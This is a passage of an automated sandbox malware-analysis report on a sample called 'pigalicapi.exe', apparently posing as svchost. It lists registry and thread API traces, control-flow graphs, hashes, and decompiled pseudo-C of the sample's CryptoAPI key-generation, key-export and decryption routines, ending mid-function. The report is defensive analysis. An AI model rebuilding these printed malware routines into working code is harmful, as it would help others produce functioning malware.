                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00EC5F0B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E30: RegCloseKey.KERNEL32(00000000), ref: 00EC5F19
                                                                                                                                                                                                                                                      • Part of subcall function 00EC6CF0: RegOpenKeyExA.KERNEL32(80000001,00ED3B88,00000000,000F003F,00000000), ref: 00EC6D30
                                                                                                                                                                                                                                                      • Part of subcall function 00EC6CF0: RegQueryValueExA.KERNEL32(00000000,00ED3FA6,00000000,00000003,?,00000020), ref: 00EC6D61
                                                                                                                                                                                                                                                      • Part of subcall function 00EC6CF0: RegDeleteValueA.ADVAPI32(00000000,00ED3FA6), ref: 00EC6D7E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC6CF0: RegCloseKey.ADVAPI32(00000000), ref: 00EC6D88
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 00EC5F67
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5F30: lstrcatA.KERNEL32(?,00ED3FE2), ref: 00EC5F7A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5F30: RegOpenKeyExA.ADVAPI32(80000001,X<,00000000,000F003F,00000000), ref: 00EC5FB3
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00EC5FF2
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00EC603B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5F30: RegCloseKey.ADVAPI32(00000000), ref: 00EC6045
                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00EC3C85
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: InitializeCriticalSection.KERNEL32(?), ref: 00EC4066
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EC407A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: EnterCriticalSection.KERNEL32(?,?), ref: 00EC40AF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC40C6
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: TerminateThread.KERNEL32(00000000,00000000), ref: 00EC40E6
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: ResetEvent.KERNEL32(00000000), ref: 00EC40F7
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: LeaveCriticalSection.KERNEL32(?), ref: 00EC4101
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4020: CreateThread.KERNEL32 ref: 00EC4118
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC3F70
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(?), ref: 00EC3FF4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\pigalicapi.exe$R+g$Topdawabe$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                    • API String ID: 1389186475-1687088032
                                                                                                                                                                                                                                                    • Opcode ID: f32ee04b7fd3e243bf283176bfa851bcc2e21c4973037778276994c8f4e02330
                                                                                                                                                                                                                                                    • Instruction ID: fa0a5e98c22aac5301f9001a382a721af1339a5c9ee5a1f78eefb381a596d7a0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f32ee04b7fd3e243bf283176bfa851bcc2e21c4973037778276994c8f4e02330
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0C128F0A44364AFE724DB65AC1AFBA77B0AB14705F0440EEF148761D2DB724B8A8F51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 745 ec4880-ec489d 747 ec4a9f-ec4ab1 CryptReleaseContext 745->747 748 ec48a3-ec48b9 call ec7b70 745->748 751 ec48be-ec48f3 CryptCreateHash 748->751 752 ec48f9-ec4913 CryptHashData 751->752 753 ec4a90-ec4a96 751->753 756 ec4919-ec4944 CryptDeriveKey 752->756 757 ec4a83-ec4a8a CryptDestroyHash 752->757 754 ec4a98 753->754 755 ec4a9a 753->755 754->747 755->747 756->757 758 ec494a-ec498f CryptDecrypt CryptDestroyKey 756->758 757->753 758->757 759 ec4995-ec49b1 CryptCreateHash 758->759 759->757 760 ec49b7-ec49d4 CryptHashData 759->760 761 ec49da-ec4a0f CryptGetHashParam 760->761 762 ec4a76-ec4a7d CryptDestroyHash 760->762 761->762 763 ec4a11-ec4a3c CryptGetHashParam 761->763 762->757 763->762 764 ec4a3e-ec4a58 call ec7c70 763->764 764->762 767 ec4a5a-ec4a72 call ec7b70 764->767 767->762
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC48EB
                                                                                                                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 00EC490B
                                                                                                                                                                                                                                                    • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00EC493C
                                                                                                                                                                                                                                                    • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 00EC496F
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC4982
                                                                                                                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 00EC49A9
                                                                                                                                                                                                                                                    • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 00EC49CC
                                                                                                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 00EC4A07
                                                                                                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00EC4A34
                                                                                                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(?), ref: 00EC4A7D
                                                                                                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00EC4A8A
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC4AA5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                    • String ID: eF
                                                                                                                                                                                                                                                    • API String ID: 2727466597-1572659738
                                                                                                                                                                                                                                                    • Opcode ID: 376672e8ff5d7c55cf69c268fc6d6c1aecffa861c556dafb0a3946157bc49be0
                                                                                                                                                                                                                                                    • Instruction ID: 600ac78272942681b3b7c44b82793207eb4e494f5f7bff6ab83f5fa24b52c5e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 376672e8ff5d7c55cf69c268fc6d6c1aecffa861c556dafb0a3946157bc49be0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D510FB1A50318ABDB25CB50CD55FEA777CAB48B04F0045D8F609B61C0EB769B89CF64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 788 ec8800-ec8811 789 ec895c-ec8962 788->789 790 ec8817-ec881b 788->790 790->789 791 ec8821-ec8843 CryptAcquireContextA 790->791 792 ec887a-ec887e 791->792 793 ec8845-ec8855 GetLastError 791->793 792->789 796 ec8884-ec88b7 CryptGenKey 792->796 794 ec8857-ec885e 793->794 795 ec8860-ec8874 CryptAcquireContextA 793->795 794->792 794->795 795->792 797 ec88bd-ec88d7 CryptExportKey 796->797 798 ec8950-ec8956 CryptReleaseContext 796->798 799 ec88d9-ec88dd 797->799 800 ec8946-ec894a CryptDestroyKey 797->800 798->789 801 ec893f 799->801 802 ec88df-ec88e3 799->802 800->798 801->800 802->801 803 ec88e5-ec88e9 802->803 803->801 804 ec88eb-ec88ef 803->804 804->801 805 ec88f1-ec8914 CryptImportKey 804->805 806 ec893d 805->806 807 ec8916-ec8937 CryptExportKey CryptDestroyKey 805->807 806->800 807->806
                                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                                    			E00EC8800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				long* _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				long* _v32;
                                                                                                                                                                                                                                                    				char* _t41;
                                                                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                                                                    				int _t51;
                                                                                                                                                                                                                                                    				char* _t71;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_t41 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                    					if(_t42 == 0) {
                                                                                                                                                                                                                                                    						_v16 = GetLastError();
                                                                                                                                                                                                                                                    						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                    							_t71 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v28 = 0x80;
                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                    						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                    						_t43 = _v24;
                                                                                                                                                                                                                                                    						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                                                                    							_t46 = _a4;
                                                                                                                                                                                                                                                    							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                    								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                    									_v8 = 1;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v32 = 0;
                                                                                                                                                                                                                                                    									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                    									if(_t49 != 0) {
                                                                                                                                                                                                                                                    										_t51 = _v20;
                                                                                                                                                                                                                                                    										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                    										_v8 = _t51;
                                                                                                                                                                                                                                                    										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							CryptDestroyKey(_v20); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                    0x00ec8806
                                                                                                                                                                                                                                                    0x00ec8811
                                                                                                                                                                                                                                                    0x00ec895c
                                                                                                                                                                                                                                                    0x00ec8962
                                                                                                                                                                                                                                                    0x00ec8821
                                                                                                                                                                                                                                                    0x00ec8821
                                                                                                                                                                                                                                                    0x00ec8831
                                                                                                                                                                                                                                                    0x00ec883b
                                                                                                                                                                                                                                                    0x00ec8843
                                                                                                                                                                                                                                                    0x00ec884b
                                                                                                                                                                                                                                                    0x00ec8855
                                                                                                                                                                                                                                                    0x00ec8869
                                                                                                                                                                                                                                                    0x00ec8874
                                                                                                                                                                                                                                                    0x00ec8874
                                                                                                                                                                                                                                                    0x00ec8855
                                                                                                                                                                                                                                                    0x00ec887e
                                                                                                                                                                                                                                                    0x00ec8884
                                                                                                                                                                                                                                                    0x00ec888b
                                                                                                                                                                                                                                                    0x00ec889b
                                                                                                                                                                                                                                                    0x00ec88a2
                                                                                                                                                                                                                                                    0x00ec88af
                                                                                                                                                                                                                                                    0x00ec88b7
                                                                                                                                                                                                                                                    0x00ec88c1
                                                                                                                                                                                                                                                    0x00ec88cf
                                                                                                                                                                                                                                                    0x00ec88d7
                                                                                                                                                                                                                                                    0x00ec88dd
                                                                                                                                                                                                                                                    0x00ec893f
                                                                                                                                                                                                                                                    0x00ec88f1
                                                                                                                                                                                                                                                    0x00ec88f1
                                                                                                                                                                                                                                                    0x00ec890c
                                                                                                                                                                                                                                                    0x00ec8914
                                                                                                                                                                                                                                                    0x00ec8926
                                                                                                                                                                                                                                                    0x00ec892a
                                                                                                                                                                                                                                                    0x00ec8930
                                                                                                                                                                                                                                                    0x00ec8937
                                                                                                                                                                                                                                                    0x00ec8937
                                                                                                                                                                                                                                                    0x00ec893d
                                                                                                                                                                                                                                                    0x00ec88dd
                                                                                                                                                                                                                                                    0x00ec894a
                                                                                                                                                                                                                                                    0x00ec894a
                                                                                                                                                                                                                                                    0x00ec8956
                                                                                                                                                                                                                                                    0x00ec8956
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec887e

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00EC8420,00000000,00001000,00000000), ref: 00EC883B
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC8845
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8874
                                                                                                                                                                                                                                                    • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 00EC88AF
                                                                                                                                                                                                                                                    • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 00EC88CF
                                                                                                                                                                                                                                                    • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 00EC890C
                                                                                                                                                                                                                                                    • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 00EC892A
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(?), ref: 00EC8937
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC894A
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8956
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8864
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC882C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                    • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                    • Opcode ID: efbe15bfe96bd16e07eb2bf4b42648fc7aaf564f4a6e253f57d64eeb56ce1f4d
                                                                                                                                                                                                                                                    • Instruction ID: c00b959e89a8ab57bc99fc2076d4c660bd24586ff6a0244e2643f41cd38cf663
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efbe15bfe96bd16e07eb2bf4b42648fc7aaf564f4a6e253f57d64eeb56ce1f4d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9413A71A00209EFEB14CFA5CA49FAE77B8BB44704F14851DF519B6280CBB69946CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                                                                                                                                    			E00EC8BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				int _v24;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                    				char* _t36;
                                                                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                    				char* _t41;
                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_t36 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                    						_t37 = GetLastError();
                                                                                                                                                                                                                                                    						_v16 = _t37;
                                                                                                                                                                                                                                                    						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                    							_t57 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                                                                    							_t39 = _a8;
                                                                                                                                                                                                                                                    							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                    							if(_t39 != 0) {
                                                                                                                                                                                                                                                    								_v24 = 0;
                                                                                                                                                                                                                                                    								_v28 = 4;
                                                                                                                                                                                                                                                    								_t41 =  &_v28;
                                                                                                                                                                                                                                                    								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                    								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                    									_v32 = _a16;
                                                                                                                                                                                                                                                    									_t43 = _a12;
                                                                                                                                                                                                                                                    									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                    									if(_t43 != 0) {
                                                                                                                                                                                                                                                    										_v8 = _v32;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                    0x00ec8bb6
                                                                                                                                                                                                                                                    0x00ec8bc1
                                                                                                                                                                                                                                                    0x00ec8ce7
                                                                                                                                                                                                                                                    0x00ec8ced
                                                                                                                                                                                                                                                    0x00ec8be5
                                                                                                                                                                                                                                                    0x00ec8be5
                                                                                                                                                                                                                                                    0x00ec8bf5
                                                                                                                                                                                                                                                    0x00ec8bff
                                                                                                                                                                                                                                                    0x00ec8c07
                                                                                                                                                                                                                                                    0x00ec8c09
                                                                                                                                                                                                                                                    0x00ec8c0f
                                                                                                                                                                                                                                                    0x00ec8c19
                                                                                                                                                                                                                                                    0x00ec8c2d
                                                                                                                                                                                                                                                    0x00ec8c38
                                                                                                                                                                                                                                                    0x00ec8c38
                                                                                                                                                                                                                                                    0x00ec8c19
                                                                                                                                                                                                                                                    0x00ec8c42
                                                                                                                                                                                                                                                    0x00ec8c59
                                                                                                                                                                                                                                                    0x00ec8c61
                                                                                                                                                                                                                                                    0x00ec8c65
                                                                                                                                                                                                                                                    0x00ec8c71
                                                                                                                                                                                                                                                    0x00ec8c79
                                                                                                                                                                                                                                                    0x00ec8c7b
                                                                                                                                                                                                                                                    0x00ec8c82
                                                                                                                                                                                                                                                    0x00ec8c8b
                                                                                                                                                                                                                                                    0x00ec8c99
                                                                                                                                                                                                                                                    0x00ec8ca1
                                                                                                                                                                                                                                                    0x00ec8cae
                                                                                                                                                                                                                                                    0x00ec8cb7
                                                                                                                                                                                                                                                    0x00ec8cc1
                                                                                                                                                                                                                                                    0x00ec8cc9
                                                                                                                                                                                                                                                    0x00ec8cce
                                                                                                                                                                                                                                                    0x00ec8cce
                                                                                                                                                                                                                                                    0x00ec8cc9
                                                                                                                                                                                                                                                    0x00ec8ca1
                                                                                                                                                                                                                                                    0x00ec8cd5
                                                                                                                                                                                                                                                    0x00ec8cd5
                                                                                                                                                                                                                                                    0x00ec8ce1
                                                                                                                                                                                                                                                    0x00ec8ce1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec8c42

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8BFF
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC8C09
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8C38
                                                                                                                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC8C59
                                                                                                                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00EC8C71
                                                                                                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 00EC8C99
                                                                                                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00EC8CC1
                                                                                                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00EC8CD5
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8CE1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8C28
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8BF0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                    • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                    • Opcode ID: ba47ef4bebe14e56af3dea77fcc4314282ada6edb04a85232c35c4e7fdc0b81a
                                                                                                                                                                                                                                                    • Instruction ID: 2d16a7f747f9a4bd2ad996918e2fa06c4d4be333a37c4894b2beea409e38601b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba47ef4bebe14e56af3dea77fcc4314282ada6edb04a85232c35c4e7fdc0b81a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D411671A40209EFDB14CF95CA49FEFB7B8BB04704F14811DF605B6280CBB69A46CB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC8A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				long* _v20;
                                                                                                                                                                                                                                                    				long* _v24;
                                                                                                                                                                                                                                                    				char* _t35;
                                                                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_t35 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                                    						_v16 = GetLastError();
                                                                                                                                                                                                                                                    						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                    							_t62 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                    						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                    						if(_t38 != 0) {
                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                    							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
                                                                                                                                                                                                                                                    								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                    								CryptDestroyKey(_v24);
